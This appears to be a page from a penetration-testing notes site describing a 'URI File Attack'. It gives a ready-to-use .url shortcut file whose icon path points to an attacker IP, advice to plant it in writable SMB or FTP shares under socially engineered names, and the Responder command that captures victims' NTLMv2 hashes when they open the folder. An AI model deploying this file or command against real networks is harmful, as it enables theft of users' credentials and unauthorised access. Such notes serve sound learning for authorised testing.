URI File Attack

The File

The content of the @hax.url file that is to be put in any open share of the domain.

For example, we could put this file in a SMB or FTP share that we have WRITE permission access to and wait for any users to click on the file.

The IP address in the IconFile corresponds to our attacker IP address.

Name of the file: The name of the file can be whatever we want, but we want to try the name of the file to match the folder it will be uploaded on, for example finance, PrintJob, etc. Be creative and use social engineering to make people click on the file.

The name of the file needs to end with .url
The @ at the beginning is to put the file at the top of the folder files list.

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.118.14\%USERNAME%.icon
IconIndex=1

Responder

Start responder on your attacker machine and wait for any user to click on the file. When any user will click on the file, we will get the victim's NTLMv2 hash.

 sudo responder -I tap0 -v

Previousfuzzer.py NextPowercat

Last updated 2 years ago